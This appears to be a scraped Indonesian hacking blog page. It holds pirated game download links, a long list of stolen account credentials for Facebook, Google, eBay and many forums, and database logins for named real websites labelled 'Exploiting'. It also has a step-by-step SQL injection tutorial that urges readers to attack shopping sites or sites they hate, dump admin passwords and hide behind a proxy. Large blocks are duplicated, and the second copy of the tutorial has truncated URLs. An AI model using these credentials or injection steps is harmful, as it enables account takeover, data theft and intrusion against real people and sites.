yang ada bakat bawa truk monggo di coba ,,wakoawkowawkoawko
Minimum system requirements:
* Windows XP/Vista/Windows 7
* 2.2 GHz CPU
* 1 GB RAM (2+ recommended on Vista)
* 1 GB HD Space
* 256 MB graphics accelerator (GeForce FX or better class, ATI 9600 class)
1. Mounting image
2. Runs the file “extremetrucker.exe”
3. Playing
_________..._______________________________
http://rapidshare.com/files/292815420/18.EXTREME.part1.rar
-----
http://rapidshare.com/files/292810974/18.EXTREME.part2.rar
Lihat Selengkapnya
Green winner's
Rabu, 09 Februari 2011
Nonton gratissss
Buat yang lagi pengen/suka nonton(download) film HOT yang full version tapi tanpa bayar sepesar pun,nih ta kasi id sama password hasil curian dari web : brandybelle.com
Member ID: 41503839
Username: kawagucy55
Password: mariko
URL: Click Here to Enter the Site! brandybelle.com
Note: This transaction will appear as PAY-ACTWEB.COM 866-311-4856 ...on your statement.
untuk ID web-web yang lain ini dia:
(mungkin udah ada beberapa ID yang sdh di ganti sama pemiliknya)
----------------------------------------
web
user name
password
---------------------------------------
TOLONG PASSWORDNYA JANGAN DI GANTI <--- Etika Hacker
Code
http://www.opensubtitles.com/
lolos33
aelara33
--------------------
Code:
http://www.mobilesmania.com/
lolos33
aelara33
--------------------
Code:
http://torrentmatrix.com/
mikebenq
benq33
--------------------
Code:
http://www.problems-chat.com/
lolos33
aelara33
--------------------
Code:
https://login.facebook.com/
mike.benq@gmail.com
aelarag3
--------------------
Code:
http://pdf.phileleftheros.com/
a.odisseos@gmail.com
aelara
--------------------
Code:
http://g3twarez.com/
lolos33
aelara33
--------------------
Code:
http://www.bourdela.com/
mike.benq
benq25
--------------------
Code:
http://420web.mail.everyone.net/
lolos
aelara33
--------------------
Code:
https://www.symbiansigned.com/
a.odysseos@cytanet.com.cy
aelara33
--------------------
Code:
http://forum.ppcwarez.org/
lolos33
aelara33
--------------------
Code:
http://www.youtube.com/
okapios
aelara
--------------------
Code:
http://freehostia.com/
mikben
1178085
--------------------
Code:
http://pareoula-forum.com/
lolos_33
aelara33
--------------------
Code:
http://hi5.com/
mike.benq@gmail.com
aelara
--------------------
Code:
http://www.freestuff.gr/
lolos33
aelara33
--------------------
Code:
http://www.blue-bytez.com/
lolos33
aelara33
--------------------
Code:
https://sso.forum.nokia.com/
lolos_33
aelara33
--------------------
Code:
http://x86-hackmac.foren-city.de/
lolos33
aelara33
--------------------
Code:
http://blue-whitegt.com/
lolos33
aelara33
--------------------
Code:
http://192.168/
.1.1
lolos33
nereok
--------------------
Code:
http://rs287.rapidshare.com/
2770218
X2BmAuRX9p
--------------------
Code:
http://greek-power.info/
lolos33
aelara33
--------------------
Code:
http://www.lexrites.com/
lolos_33
aelara33
--------------------
Code:
http://ellinadiko.com/
lolos_3
93281037
--------------------
Code:
http://www.syfael.com/
lolos_ael
aelarag3
--------------------
Code:
https://www.tim.gr/
a.odisseos@gmail.com
aelara
--------------------
Code:
http://s5.bitefight.gr/
lolos33
aelara33
--------------------
Code:
https://myservices.cytanet.com.cy/
thematch
120806
--------------------
Code:
http://www.greektvsubs.gr/
lolos33
aelara33
--------------------
Code:
https://www.google.com/
a.odisseos@gmail.com
aelara33
mike.benq@gmail.com
benq25
--------------------
Code:
http://greek-tracker.com/
lolos33
aelara
lolos3
406Yx0hXQY
--------------------
Code:
http://www.ipmart-forum.com/
lolos33
aelara33
--------------------
Code:
http://www.noeman.org/
lolos_33
aelara33
--------------------
Code:
http://cyprusddl.latioszone.com/
lolos33
aelara33
--------------------
Code:
http://www.i-choice.com.cy/
oma7477
25382662
--------------------
Code:
https://www.thematchnews.com:2096/
contact@thematchnews.com
thematch2006
--------------------
Code:
http://forum.insanelymac.com/
lolos33
aelara33
--------------------
Code:
http://cfa.ltvliveweb.com/
a.odisseos
nereok33
--------------------
Code:
http://www.hi5.com/
mike.benq@gmail.com
aelara
--------------------
Code:
http://www.thegreekz.com/
lolos33
aelara33
--------------------
Code:
http://www.pda4x.com/
lolos33
aelara33
--------------------
Code:
http://www.cytanet.com.cy/
thematch
120806
--------------------
Code:
http://syfael.com/
lolos_ael
aelarag3
--------------------
Code:
https://www.thematchnews.com:2083/
thematch2006
--------------------
Code:
http://www.facebook.com/
mike.benq@gmail.com
aelara33
--------------------
Code:
http://www.oliv3r.net/
lolos33
aelara33
--------------------
Code:
http://cypruswarez.com/
lolos33
aelara33
mike.benq
aelara
--------------------
Code:
http://ael1930.com/
mikeg3
mikeg3
--------------------
Code:
http://www.spideradsl.com/
oma7477
25382662
--------------------
Code:
http://www.cypruszone.net/
mike_benq
aelara
mike.benq@gmail.com
aelara
--------------------
www.thematchnews.com:80 (members area)
match80
ba98pp80
--------------------
Code:
http://www.adultshow.gr/
mike.benq
aelara33
--------------------
Code:
http://www.g3twarez.com/
lolos33mike.benq@gmail.co
aelara33
--------------------
Code:
http://www.gnosinet.gr/
lolos33
aelara33
--------------------
Code:
https://signin.ebay.co.uk/
lolos_andreas
aelara33
--------------------
Code:
http://www.pareoula-forum.com/
lolos_33
aelara33
--------------------
Code:
http://forum.ppcwarez.info/
lolos33
aelara33
--------------------
Code:
http://www.gamato.info/
lolos33
gNaDI2qAUa
--------------------
Code:
http://www.greekzlive.com/
lolos33
aelara33
--------------------
Code:
http://greekbits.org/
lolosnadrea
aelara
--------------------
Code:
http://apps.facebook.com/
maria_art_3@hotmail.com
antrikoui
--------------------
192.168.1.1:80 ()
lolos33
nereok
--------------------
Code:
http://www.dailymotion.com/
okapios
aelara33
--------------------
Code:
https://www.play.com/
a.odisseos@gmail.com
aelara
--------------------
Code:
https://cp.freehostia.com/
mikben
1178085
--------------------
Code:
http://lolos.freehostia.com/
lolos33
aelara33
--------------------
Code:
http://www.pxdxa.com/
lolos33
aelarag3
--------------------
Code:
http://ael-limassol.net/
lolos_ael
aelarag3
--------------------
Code:
http://www.blue-whitegt.com/
lolos33
44653
--------------------
Code:
http://pbforum.org/
lolos33
aelara33
--------------------
Code:
http://www.tagged.com/
lolos_andreas@hotmail.com
aelara
--------------------
Code:
https://signin.ebay.com/
lolos_andreas
aelara33
--------------------
Code:
http://rapidshare.de/
2770218
X2BmAuRX9p
--------------------
Code:
http://sharez.org/
mike.benq
aelara33
--------------------
Code:
http://www.nextdoormodelsgr.com/
lolos33
aelara33
--------------------
Code:
https://netrunner.cytanet.com.cy/
oma7477
25382662
--------------------
Code:
http://candyman.forumlivre.com/
lolos33
aelara33
--------------------
Code:
http://forums.phone-tools.cn/
lolos_33
aelara
--------------------
Code:
http://www.basketforum.gr/
lolos33
aelara33
--------------------
Code:
http://www.bigsoccer.com/
lolos33
aelara33
--------------------
Code:
http://www.greek-tracker.com/
lolos3
8igX19SezX
--------------------
Code:
http://www.soccer-fans.gr/
lolos33
aelara33
--------------------
Code:
http://www.greekbits.org/
lolosandrea
aelara
--------------------
Code:
http://www.ael-limassol.net/
lolos_ael
aelarag3
--------------------
Code:
http://forum.xda-developers.com/
lolos33
aelara33
--------------------
Code:
http://apsubs.com/
lolos33
aelara33
--------------------
Code:
http://mail.avacom.net/
ael.net
1930
--------------------
Code:
http://greekzter.com/
lolos33
aelara33
--------------------
Code:
http://www.ellinadiko.com/
lolos33
aelara33
--------------------
Code:
http://www.c4pda.com/
lolos33
aelara33
--------------------
Code:
http://en.soft4gsm.com/
mike.benq@gmail.com
6907
--------------------
Code:
http://www.myspace.com/
mike.benq@gmail.com
aelara33
--------------------
Code:
http://www.sportimages.com.cy/
photos
photos
--------------------
Code:
http://www.avacom.net/
ael.net
1930
--------------------
Code:
http://www.apsubs.com/
lolos33
aelara33
--------------------
Member ID: 41503839
Username: kawagucy55
Password: mariko
URL: Click Here to Enter the Site! brandybelle.com
Note: This transaction will appear as PAY-ACTWEB.COM 866-311-4856 ...on your statement.
untuk ID web-web yang lain ini dia:
(mungkin udah ada beberapa ID yang sdh di ganti sama pemiliknya)
----------------------------------------
web
user name
password
---------------------------------------
TOLONG PASSWORDNYA JANGAN DI GANTI <--- Etika Hacker
Code
http://www.opensubtitles.com/
lolos33
aelara33
--------------------
Code:
http://www.mobilesmania.com/
lolos33
aelara33
--------------------
Code:
http://torrentmatrix.com/
mikebenq
benq33
--------------------
Code:
http://www.problems-chat.com/
lolos33
aelara33
--------------------
Code:
https://login.facebook.com/
mike.benq@gmail.com
aelarag3
--------------------
Code:
http://pdf.phileleftheros.com/
a.odisseos@gmail.com
aelara
--------------------
Code:
http://g3twarez.com/
lolos33
aelara33
--------------------
Code:
http://www.bourdela.com/
mike.benq
benq25
--------------------
Code:
http://420web.mail.everyone.net/
lolos
aelara33
--------------------
Code:
https://www.symbiansigned.com/
a.odysseos@cytanet.com.cy
aelara33
--------------------
Code:
http://forum.ppcwarez.org/
lolos33
aelara33
--------------------
Code:
http://www.youtube.com/
okapios
aelara
--------------------
Code:
http://freehostia.com/
mikben
1178085
--------------------
Code:
http://pareoula-forum.com/
lolos_33
aelara33
--------------------
Code:
http://hi5.com/
mike.benq@gmail.com
aelara
--------------------
Code:
http://www.freestuff.gr/
lolos33
aelara33
--------------------
Code:
http://www.blue-bytez.com/
lolos33
aelara33
--------------------
Code:
https://sso.forum.nokia.com/
lolos_33
aelara33
--------------------
Code:
http://x86-hackmac.foren-city.de/
lolos33
aelara33
--------------------
Code:
http://blue-whitegt.com/
lolos33
aelara33
--------------------
Code:
http://192.168/
.1.1
lolos33
nereok
--------------------
Code:
http://rs287.rapidshare.com/
2770218
X2BmAuRX9p
--------------------
Code:
http://greek-power.info/
lolos33
aelara33
--------------------
Code:
http://www.lexrites.com/
lolos_33
aelara33
--------------------
Code:
http://ellinadiko.com/
lolos_3
93281037
--------------------
Code:
http://www.syfael.com/
lolos_ael
aelarag3
--------------------
Code:
https://www.tim.gr/
a.odisseos@gmail.com
aelara
--------------------
Code:
http://s5.bitefight.gr/
lolos33
aelara33
--------------------
Code:
https://myservices.cytanet.com.cy/
thematch
120806
--------------------
Code:
http://www.greektvsubs.gr/
lolos33
aelara33
--------------------
Code:
https://www.google.com/
a.odisseos@gmail.com
aelara33
mike.benq@gmail.com
benq25
--------------------
Code:
http://greek-tracker.com/
lolos33
aelara
lolos3
406Yx0hXQY
--------------------
Code:
http://www.ipmart-forum.com/
lolos33
aelara33
--------------------
Code:
http://www.noeman.org/
lolos_33
aelara33
--------------------
Code:
http://cyprusddl.latioszone.com/
lolos33
aelara33
--------------------
Code:
http://www.i-choice.com.cy/
oma7477
25382662
--------------------
Code:
https://www.thematchnews.com:2096/
contact@thematchnews.com
thematch2006
--------------------
Code:
http://forum.insanelymac.com/
lolos33
aelara33
--------------------
Code:
http://cfa.ltvliveweb.com/
a.odisseos
nereok33
--------------------
Code:
http://www.hi5.com/
mike.benq@gmail.com
aelara
--------------------
Code:
http://www.thegreekz.com/
lolos33
aelara33
--------------------
Code:
http://www.pda4x.com/
lolos33
aelara33
--------------------
Code:
http://www.cytanet.com.cy/
thematch
120806
--------------------
Code:
http://syfael.com/
lolos_ael
aelarag3
--------------------
Code:
https://www.thematchnews.com:2083/
thematch2006
--------------------
Code:
http://www.facebook.com/
mike.benq@gmail.com
aelara33
--------------------
Code:
http://www.oliv3r.net/
lolos33
aelara33
--------------------
Code:
http://cypruswarez.com/
lolos33
aelara33
mike.benq
aelara
--------------------
Code:
http://ael1930.com/
mikeg3
mikeg3
--------------------
Code:
http://www.spideradsl.com/
oma7477
25382662
--------------------
Code:
http://www.cypruszone.net/
mike_benq
aelara
mike.benq@gmail.com
aelara
--------------------
www.thematchnews.com:80 (members area)
match80
ba98pp80
--------------------
Code:
http://www.adultshow.gr/
mike.benq
aelara33
--------------------
Code:
http://www.g3twarez.com/
lolos33mike.benq@gmail.co
aelara33
--------------------
Code:
http://www.gnosinet.gr/
lolos33
aelara33
--------------------
Code:
https://signin.ebay.co.uk/
lolos_andreas
aelara33
--------------------
Code:
http://www.pareoula-forum.com/
lolos_33
aelara33
--------------------
Code:
http://forum.ppcwarez.info/
lolos33
aelara33
--------------------
Code:
http://www.gamato.info/
lolos33
gNaDI2qAUa
--------------------
Code:
http://www.greekzlive.com/
lolos33
aelara33
--------------------
Code:
http://greekbits.org/
lolosnadrea
aelara
--------------------
Code:
http://apps.facebook.com/
maria_art_3@hotmail.com
antrikoui
--------------------
192.168.1.1:80 ()
lolos33
nereok
--------------------
Code:
http://www.dailymotion.com/
okapios
aelara33
--------------------
Code:
https://www.play.com/
a.odisseos@gmail.com
aelara
--------------------
Code:
https://cp.freehostia.com/
mikben
1178085
--------------------
Code:
http://lolos.freehostia.com/
lolos33
aelara33
--------------------
Code:
http://www.pxdxa.com/
lolos33
aelarag3
--------------------
Code:
http://ael-limassol.net/
lolos_ael
aelarag3
--------------------
Code:
http://www.blue-whitegt.com/
lolos33
44653
--------------------
Code:
http://pbforum.org/
lolos33
aelara33
--------------------
Code:
http://www.tagged.com/
lolos_andreas@hotmail.com
aelara
--------------------
Code:
https://signin.ebay.com/
lolos_andreas
aelara33
--------------------
Code:
http://rapidshare.de/
2770218
X2BmAuRX9p
--------------------
Code:
http://sharez.org/
mike.benq
aelara33
--------------------
Code:
http://www.nextdoormodelsgr.com/
lolos33
aelara33
--------------------
Code:
https://netrunner.cytanet.com.cy/
oma7477
25382662
--------------------
Code:
http://candyman.forumlivre.com/
lolos33
aelara33
--------------------
Code:
http://forums.phone-tools.cn/
lolos_33
aelara
--------------------
Code:
http://www.basketforum.gr/
lolos33
aelara33
--------------------
Code:
http://www.bigsoccer.com/
lolos33
aelara33
--------------------
Code:
http://www.greek-tracker.com/
lolos3
8igX19SezX
--------------------
Code:
http://www.soccer-fans.gr/
lolos33
aelara33
--------------------
Code:
http://www.greekbits.org/
lolosandrea
aelara
--------------------
Code:
http://www.ael-limassol.net/
lolos_ael
aelarag3
--------------------
Code:
http://forum.xda-developers.com/
lolos33
aelara33
--------------------
Code:
http://apsubs.com/
lolos33
aelara33
--------------------
Code:
http://mail.avacom.net/
ael.net
1930
--------------------
Code:
http://greekzter.com/
lolos33
aelara33
--------------------
Code:
http://www.ellinadiko.com/
lolos33
aelara33
--------------------
Code:
http://www.c4pda.com/
lolos33
aelara33
--------------------
Code:
http://en.soft4gsm.com/
mike.benq@gmail.com
6907
--------------------
Code:
http://www.myspace.com/
mike.benq@gmail.com
aelara33
--------------------
Code:
http://www.sportimages.com.cy/
photos
photos
--------------------
Code:
http://www.avacom.net/
ael.net
1930
--------------------
Code:
http://www.apsubs.com/
lolos33
aelara33
--------------------
Database Login
bagi yg bener2 pengen belajar usaha sendiri aja
Exploiting http://dhpaintball.com/ ...
DB Username: dhpaintballcom
DB Password: PnTPEgj9Gd
Exploiting http://jefflabar.com/ ...
DB Username: root
DB Password: onb3aq47
Exploiting http://kenelvtt.free.fr/ ...
DB Username: kenelvtt
DB Password: giantxt
Exploiting http://agroleitecas...trolanda.com.br/
DB Username: agroleite
DB Password: #44x226#
Exploiting http://schildersbedrijf-kovacs.net/
DB Username: gaborholland
DB Password: atz123
Exploiting http://martia-victrix.ru/
DB Username: martia
DB Password: FMMTMXeA
Exploiting http://rocksuli.hu/
DB Username: rocksuli
DB Password: rck934
Exploiting http://shors.ru/ ...
DB Username: shors
DB Password: bn57xcTh
Exploiting http://insbs.ru/ ...
DB Username: Slavari_qwsaxz
DB Password: cvj3123
Exploiting http://alternativ-fight.net/ ...
DB Username: alternativ_01
DB Password: 210387nomi
Exploiting http://pans-mechta.com/ ...
DB Username: pansme_admin
DB Password: gjlrevjr
Exploiting http://jovinatics.com/ ...
DB Username: AltaW_sue
DB Password: manson
Exploiting http://obqvizapavlikeni.com/ ...
DB Username: obqvizap_shenc
DB Password: Gu#E5hkVq6,7
Exploiting http://cvhe.hu/ ...
DB Username: cvhe
DB Password: heuCh11bRute
Exploiting http://mindenkiszep.hu/ ...
DB Username: mindenkiszep
DB Password: HmP67gIw
Exploiting http://egermester.hu/ ...
DB Username: egermester:-P
DB Password: 4791bewtersemregE
Exploiting http://dhpaintball.com/ ...
DB Username: dhpaintballcom
DB Password: PnTPEgj9Gd
Exploiting http://jefflabar.com/ ...
DB Username: root
DB Password: onb3aq47
Exploiting http://kenelvtt.free.fr/ ...
DB Username: kenelvtt
DB Password: giantxt
Exploiting http://agroleitecas...trolanda.com.br/
DB Username: agroleite
DB Password: #44x226#
Exploiting http://schildersbedrijf-kovacs.net/
DB Username: gaborholland
DB Password: atz123
Exploiting http://martia-victrix.ru/
DB Username: martia
DB Password: FMMTMXeA
Exploiting http://rocksuli.hu/
DB Username: rocksuli
DB Password: rck934
Exploiting http://shors.ru/ ...
DB Username: shors
DB Password: bn57xcTh
Exploiting http://insbs.ru/ ...
DB Username: Slavari_qwsaxz
DB Password: cvj3123
Exploiting http://alternativ-fight.net/ ...
DB Username: alternativ_01
DB Password: 210387nomi
Exploiting http://pans-mechta.com/ ...
DB Username: pansme_admin
DB Password: gjlrevjr
Exploiting http://jovinatics.com/ ...
DB Username: AltaW_sue
DB Password: manson
Exploiting http://obqvizapavlikeni.com/ ...
DB Username: obqvizap_shenc
DB Password: Gu#E5hkVq6,7
Exploiting http://cvhe.hu/ ...
DB Username: cvhe
DB Password: heuCh11bRute
Exploiting http://mindenkiszep.hu/ ...
DB Username: mindenkiszep
DB Password: HmP67gIw
Exploiting http://egermester.hu/ ...
DB Username: egermester:-P
DB Password: 4791bewtersemregE
Hacker newbiee
1.) Cek Bug
Cari Di google Ato Search Engine Lain Nya Situs" Shopping ato Site Yg u Benci..
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url’
contoh http://www.target.com/news.php?id=5'
maka akan muncul error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
ATAU YG Mendekati
Itu berarti kita bisa gunakan Sql Injection
2). Mencari nomor dari kolom
Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY
Kita melakukan perurutan nomor sampai ada error
http://www.target.com/news.php?id=5+order+by+1%2F* <– no error
http://www.target.com/news.php?id=5+order+by+2%2F* <– no error
http://www.target.com/news.php?id=5+order+by+3%2F* <– no error
http://www.target.com/news.php?id=5+order+by+4%2F* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4' in ‘order clause’ atau sesuatu seperti itu…ya gitu degh ( )
Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.
Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.
3). Menggunakan fungsi UNION
Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.
Jadi kita mendapatkan
http://www.target.com/news.php?id=5+UNION+SELECT+1%2C2%2C3%2F * (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)
Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION
4). Check versi dari MySQL
http://www.target.com/news.php?id=5+union+select+1%2C2%2C3%2F *
NOTE: jika /* tidak bisa atau terjadi error, coba dengan –
ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.
Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya
kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.
Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*
Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Yang kita butuhkan adalah fungsi convert()
contoh :
http://www.target.com/news.php?id=5+union+select+1%2Cconvert%28%40%40version+using+latin1%29%2C3%2F *
atau dengan hex() dan unhex()
contoh :
http://www.target.com/news.php?id=5+union+all+select+1%2Cunhex (hex(@@version)),3/*
dan kamu akan mendapatan versi MySql D
5). Mendapatkan table dan nama column
Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community…)
– Mencari Table
Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2
http://www.target.com/news.php?id=5+union+select+1%2Ctable_name%2C3+from+information_schema.tables+where+table_schema%3Ddatabase%28%29+limit+0%2C1%2F *
Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.
Sampai tabel yang dinginkan, contoh table admin
– Mencari Column
Sekarang kita cari column pada table admin
http://www.target.com/news.php?id=5+union+select+1%2Ccolumn_name%2C3+from+information_schema.columns+where+table_name%3D ’admin’+limit+0,1/*
Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa
admin = 61646D696E
Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0×61646D696E
http://www.target.com/news.php?id=5+union+select+1%2Ccolumn_name%2C3+from+information_schema.columns+where+table_name%3D0%C3%9761646D696E+limit+0%2C1%2F *
Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.
Contoh column yang keluar username dan password
Sekarang kita lihat datanya
http://www.target.com/news.php?id=5+union+select+1%2Cusername%2C3+from+admin%2F *
Contoh data yang keluar : admin
http://www.target.com/news.php?id=5+union+select+1%2Cpassword%2C3+from+admin%2F *
Contoh data yang keluar : p45w0rd
sekarang kita harus menyelesaikan query biar terlihat bagus )
untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)
contoh :
http://www.target.com/news.php?id=5+union+all+select+1%2Cconcat%28username%2C0%C3%973a%2Cpassword%29%2C3+from+admin%2F *
catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL
(ada cara lain untuk itu dengan menggunakan, char(5Cool, merupakan dari nilai decimal )
http://www.target.com/news.php?id=5+union+all+select+1%2Cconcat (username,char(5Cool,password),3+from+admin/*
Maka akan muncul tampilan data : admin:p45w0rd
Klo Brhasil brarti Langsung Login Aja Ke Admin
dengan user and pass yg udapet tadi..
Sekian Thanks... (Green winner's)
(untuk melakukan teknik diatas jangan lupa pakai proxy untuk menutupi identitas kamu biar ga dapat di lacak) --> cara pakai proxynya cari aja di google atau tunggu info berikutnya..
Resiko Di tanggung Sendiri.. !! (^_^)
Cari Di google Ato Search Engine Lain Nya Situs" Shopping ato Site Yg u Benci..
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url’
contoh http://www.target.com/news.php?id=5'
maka akan muncul error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
ATAU YG Mendekati
Itu berarti kita bisa gunakan Sql Injection
2). Mencari nomor dari kolom
Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY
Kita melakukan perurutan nomor sampai ada error
http://www.target.com/news.php?id=5+order+by+1%2F* <– no error
http://www.target.com/news.php?id=5+order+by+2%2F* <– no error
http://www.target.com/news.php?id=5+order+by+3%2F* <– no error
http://www.target.com/news.php?id=5+order+by+4%2F* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4' in ‘order clause’ atau sesuatu seperti itu…ya gitu degh ( )
Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.
Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.
3). Menggunakan fungsi UNION
Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.
Jadi kita mendapatkan
http://www.target.com/news.php?id=5+UNION+SELECT+1
Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION
4). Check versi dari MySQL
http://www.target.com/news.php?id=5+union+select+1
NOTE: jika /* tidak bisa atau terjadi error, coba dengan –
ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.
Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya
kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.
Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*
Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Yang kita butuhkan adalah fungsi convert()
contoh :
http://www.target.com/news.php?id=5+union+select+1
atau dengan hex() dan unhex()
contoh :
http://www.target.com/news.php?id=5+union+all+sele
dan kamu akan mendapatan versi MySql D
5). Mendapatkan table dan nama column
Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community…)
– Mencari Table
Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2
http://www.target.com/news.php?id=5+union+select+1
Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.
Sampai tabel yang dinginkan, contoh table admin
– Mencari Column
Sekarang kita cari column pada table admin
http://www.target.com/news.php?id=5+union+select+1
Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa
admin = 61646D696E
Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0×61646D696E
http://www.target.com/news.php?id=5+union+select+1
Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.
Contoh column yang keluar username dan password
Sekarang kita lihat datanya
http://www.target.com/news.php?id=5+union+select+1
Contoh data yang keluar : admin
http://www.target.com/news.php?id=5+union+select+1
Contoh data yang keluar : p45w0rd
sekarang kita harus menyelesaikan query biar terlihat bagus )
untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)
contoh :
http://www.target.com/news.php?id=5+union+all+sele
catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL
(ada cara lain untuk itu dengan menggunakan, char(5Cool, merupakan dari nilai decimal )
http://www.target.com/news.php?id=5+union+all+sele
Maka akan muncul tampilan data : admin:p45w0rd
Klo Brhasil brarti Langsung Login Aja Ke Admin
dengan user and pass yg udapet tadi..
Sekian Thanks... (Green winner's)
(untuk melakukan teknik diatas jangan lupa pakai proxy untuk menutupi identitas kamu biar ga dapat di lacak) --> cara pakai proxynya cari aja di google atau tunggu info berikutnya..
Resiko Di tanggung Sendiri.. !! (^_^)
Membuka 2 Account dalam 1 browsur
ika kita ingin membuka dua akun yang berbeda, biasanya cara yang kita lakukan adalah membukanya dengan browser yang berbeda.
Nah, dengan add-ons CookiePie (hanya untuk browser Firefox) anda dapat membuka 2 akun Facebook dengan satu browser.
cara instal:
1. Buka mozilla
2. klick --> file --> open file --> cookiepie
aturan pakai:
Misal, anda ingin membuka akun Facebook, buka Facebook anda dengan login akun anda yang pertama,
lalu buka Facebook lagi dengan menekan tombol Ctrl + T atau klik File lalu pilih New Tab,
kemudian pada tab yang masih kosong klik kanan, setelah itu pilih Toogle On/Off Cookie,
nah baru anda bisa login dengan akun Facebook yang berbeda.
Cara ini juga berlaku pada Gmail, Yahoo Mail, Blogger atau sejenisnya.
link download
Nah, dengan add-ons CookiePie (hanya untuk browser Firefox) anda dapat membuka 2 akun Facebook dengan satu browser.
cara instal:
1. Buka mozilla
2. klick --> file --> open file --> cookiepie
aturan pakai:
Misal, anda ingin membuka akun Facebook, buka Facebook anda dengan login akun anda yang pertama,
lalu buka Facebook lagi dengan menekan tombol Ctrl + T atau klik File lalu pilih New Tab,
kemudian pada tab yang masih kosong klik kanan, setelah itu pilih Toogle On/Off Cookie,
nah baru anda bisa login dengan akun Facebook yang berbeda.
Cara ini juga berlaku pada Gmail, Yahoo Mail, Blogger atau sejenisnya.
link download
Langganan:
Postingan (Atom)